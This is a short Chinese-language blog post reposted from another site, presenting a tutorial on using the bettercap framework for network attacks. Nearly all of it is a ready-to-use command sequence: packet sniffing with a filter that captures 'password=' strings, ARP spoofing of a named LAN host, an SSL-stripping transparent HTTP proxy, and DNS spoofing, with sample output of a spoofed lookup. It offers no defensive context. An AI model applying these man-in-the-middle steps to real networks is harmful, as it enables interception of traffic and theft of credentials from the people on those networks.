使用bettercap进行数据包嗅探

发布日期:2019-09-09 浏览次数: 6558 次

bettercap是一个强大的、容易扩展和便携式框架编写的旨在提供安全研究人员,红队一个易于使用的、一体化的解决方案,具备他们可能需要的所有功能,以执行侦察和攻击WiFi网络扫描、蓝牙低功耗设备扫描,特征枚举,读写、无被动和主动IP网络主机探测和侦察、网络嗅探器、端口扫描
Kali Linux上可以通过apt install bettercap直接安装

查看api.rest模块的帮助

get * 查看变量

net.sniff on   启动数据包嗅探器
net.sniff off   停止数据包嗅探器
net.sniff stats   打印数据包嗅探器会话配置和统计信息
net.fuzz on   为包含指定图层的每个嗅探数据包启用模糊测试
net.fuzz off   禁用模糊测试

set net.sniff.filter 'not arp'
set net.sniff.local true
set net.sniff.regexp '.*password=. '
get net.sniff.*
net.sniff on

透明HTTP(S)代理
set http.proxy.sslstrip true
set net.sniff.verbose false
set arp.spoof.targets 192.168.190.3
arp.spoof on
http.proxy on
net.sniff on
DNS欺骗
set dns.spoof.domains <domain1>,<domain2>,...
set dns.spoof.address <Target address>
欺骗整个子网:set dns.spoof.all true
dns.spoof on
ARP欺骗
arp.spoof off
set arp.spoof.targets 192.168.190.3
arp.spoof on
DNS/ARP欺骗
get dns.spoof.*     

dns.spoof.address: '192.168.1.3'

dns.spoof.all: 'false'

dns.spoof.domains: ': time.com'

get dns.spoof.*

arp.spoof.internal: 'true'

arp.spoof.targets: '192.168.1.6'

arp.spoof.whitelist: ''
C:\> nslookup time.com
服务器:csp1.zte.com.cn
地址:192.168.1.1
非权威答案:
名称:time.com
地址:192.168.1.3(Spoofed)
192.168.1.3(欺骗)
小伙伴们自行研究吧。

 

转自:黑白之道

分享到:
×

微信扫一扫分享

XML 地图 | Sitemap 地图